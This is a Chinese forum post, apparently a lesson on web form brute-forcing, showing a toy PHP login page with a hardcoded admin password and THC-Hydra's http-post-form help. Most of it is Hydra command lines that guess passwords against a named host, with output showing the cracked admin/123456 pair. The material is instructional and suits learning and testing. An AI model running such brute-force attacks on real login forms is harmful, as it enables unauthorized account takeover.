切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
201 暴力破解 — THC-Hydra 4[复制链接]
发表于 2012-10-4 22:02:45 | 显示全部楼层 |!read_mode!
看这个PHP代码
  1. <?php
  2. if(isset($_GET["usr"]) && isset($_GET["pwd"])) {
  3.   if($_GET["usr"]=="admin" && $_GET["pwd"]=="123456") {
  4.     header("Location: http://www.google.com");
  5.   } else {
  6.     echo("f0ck you");
  7.   }
  8. }
  9. ?>
  10. <html>
  11.   <body>
  12.     <form action="test.php" method="get">
  13.       <input type="text" name="usr" />
  14.       <input type="password" name="pwd" />
  15.       <input type="submit" name="login" value="Connect" />
  16.     </form>
  17.   </body>
  18. </html>
复制代码

HTTP表单,查看下模块帮助
  1. root@Dis9Team:~# hydra -U http-post-form
  2. Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

  3. Hydra (http://www.thc.org/thc-hydra) starting at 2012-07-25 00:56:55

  4. Help for module http-post-form:
  5. ============================================================================
  6. Module http-post-form requires the page and the parameters for the web form.

  7. By default this module is configured to follow a maximum of 5 redirections in
  8. a row. It always gathers a new cookie from the same URL without variables
  9. The parameters take three ":" separated values, plus optional values.

  10. Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
  11. First is the page on the server to GET or POST to (URL).
  12. Second is the POST/GET variables (taken from either the browser, proxy, etc.
  13. with usernames and passwords being replaced in the "^USER^" and "^PASS^"
  14. placeholders (FORM PARAMETERS)
  15. Third is the string that it checks for an *invalid* login (by default)
  16. Invalid condition login check can be preceded by "F=", successful condition
  17. login check must be preceded by "S=".
  18. This is where most people get it wrong. You have to check the webapp what a
  19. failed string looks like and put it in this parameter!
  20. The following parameters are optional:
  21. C=/page/uri     to define a different page to gather initial cookies from
  22. H=My-Hdr: foo   to send a user defined HTTP header with each request
  23. Examples:
  24. "/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect"
  25. "/login.php:user=^USER^&pass=^PASS^&mid=123:S=authlog=.*success"
  26. "/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"
  27. "/login:user=^USER&pass=^PASS:failed:H=Authorization: Basic dT1w:H=X-Foo: Bar"
  28. "/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"
  29. root@Dis9Team:~#
复制代码

错误的关键字是f0ck you,先抓包
http://fuzzexp.org/pen/test.php?usr=admin&pwd=11111&login=Connect
get提交 构造语句
  1. hydra -l admin -P /tmp/password -s 80 -f fuzzexp.org http-post-form "/pen/test.php?usr=admin&pwd=11111&login=Connect:f0ck"
复制代码

吧账号和密码替换成  例子中的
login.php:user=^USER^&pass=^PASS^&mid=123:incorrect
  1. root@Dis9Team:~# hydra -l admin -P /tmp/password -s 80 -f fuzzexp.org http-post-form "/pen/test.php:usr=^US^&pwd=^PASS^&login=Connect:f0ck"
  2. Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

  3. Hydra (http://www.thc.org/thc-hydra) starting at 2012-07-25 01:04:29
  4. [DATA] 3 tasks, 1 server, 3 login tries (l:1/p:3), ~1 try per task
  5. [DATA] attacking service http-post-form on port 80
  6. [80][www-form] host: 63.223.79.168   login: admin   password: 123456
  7. [STATUS] attack finished for fuzzexp.org (valid pair found)
  8. 1 of 1 target successfuly completed, 1 valid password found
  9. Hydra (http://www.thc.org/thc-hydra) finished at 2012-07-25 01:04:46
  10. root@Dis9Team:~#
复制代码

[80][www-form] host: 63.223.79.168   login: admin   password: 123456
成功破解
:f0ck是错误的关键字



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-2 02:05

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部